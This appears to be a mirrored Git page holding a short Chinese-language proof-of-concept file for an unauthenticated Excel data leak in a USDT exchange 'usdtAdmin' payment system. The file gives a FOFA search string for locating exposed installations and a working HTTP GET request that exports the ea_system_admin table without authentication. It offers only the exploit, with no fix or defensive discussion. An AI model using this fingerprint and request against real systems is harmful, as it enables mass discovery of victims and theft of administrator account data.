admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-04 18:06:34 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/虚拟币买卖USDT场外交易所/usdtAdmin收款管理系统存在excel敏感信息泄露.md

16 lines
483 B
Markdown
Raw Permalink Normal View History

Create usdtAdmin收款管理系统存在excel敏感信息泄露.md
2025-09-01 16:07:28 +08:00
# usdtAdmin收款管理系统存在excel敏感信息泄露
虚拟币买卖USDT场外交易所由于在鉴权方面存在疏漏导致了可未授权访问从而导致信息泄露
## fofa
```
"/usdtmerchant/login/reg.html"
```
## poc
```javascript
GET /index/getway/excel?down=1&table=ea_system_admin&shunxu=desc&number=100 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
```
Reference in New Issue Copy Permalink